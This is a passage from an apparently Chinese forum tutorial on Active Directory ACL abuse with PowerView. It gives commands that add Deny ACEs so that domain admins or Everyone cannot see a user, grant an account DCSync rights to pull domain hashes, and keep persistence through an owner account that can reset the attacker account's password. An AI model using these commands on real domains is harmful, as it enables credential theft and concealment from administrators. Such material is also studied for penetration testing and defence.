修改完成后:复制代码
- Set-DomainObjectOwner -identity jumbo -OwnerIdentity jumbo
[img=720,119.28358208955224]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456004.png[/img]复制代码
- .PARAMETER AccessControlType<br><br>Specifies the type of ACE (allow or deny)
[img=720,94.24446583253128]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456005.png[/img]复制代码
- [Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')]<br>[ValidateSet('Allow', 'Deny')]<br>[String[]]<br>$AccessControlType,
[img=720,24.901610017889087]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456008.jpeg[/img]复制代码
- Add-DomainObjectAcl -TargetIdentity jumbo -PrincipalIdentity S-1-5-21-12312321-1231312-123123-500 -AccessControlType Deny
可以发现域管也没权限查看jumbo用户的属性了:复制代码
- Add-DomainObjectAcl -TargetIdentity jumbo -PrincipalIdentity administrator -AccessControlType Deny
当然,把SID改成SamAccountName也是可以的:复制代码
- Remove-DomainObjectAcl -TargetIdentity jumbo -PrincipalIdentity S-1-5-21-12312321-1231312-123123-500 -Rights ALL -AccessControlType Deny
[img=720,59.907550077041606]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456016.jpeg[/img]复制代码
- Remove-DomainObjectAcl -TargetIdentity jumbo -PrincipalIdentity administrator -Rights ALL -AccessControlType Deny
[img=720,43.76353039134055]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456027.png[/img]复制代码
- Add-DomainObjectAcl -TargetIdentity jumbo2 -PrincipalIdentity S-1-1-0 -Rights All -AccessControlType Deny
当用户拥有这两条ACL后,即可使用DRS协议获取域hash凭据。给用户在域对象上添加Dcsync权限即可:复制代码
- DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)<br>DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
[img=720,107.84140969162996]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456033.png[/img]复制代码
- Set-DomainObjectOwner -identity attack -OwnerIdentity good
[img=600,228.64450127877237]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202212061456034.png[/img]复制代码
- Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity attack -Rights DCSync -AccessControlType Allow
这个时候,如果attack在发起攻击的时候被管理员发现了,把attack账号密码重置了,但是good账号是attack账号的拥有者,可以修改attack账号的ACL,比如给自己添加修改密码的权限,然后去重置attack账号的密码,然后就又可以拿来攻击了。复制代码
- Add-DomainObjectAcl -TargetIdentity attack -PrincipalIdentity S-1-1-0 -Rights All -AccessControlType Deny
欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) | Powered by Discuz! X3.4 |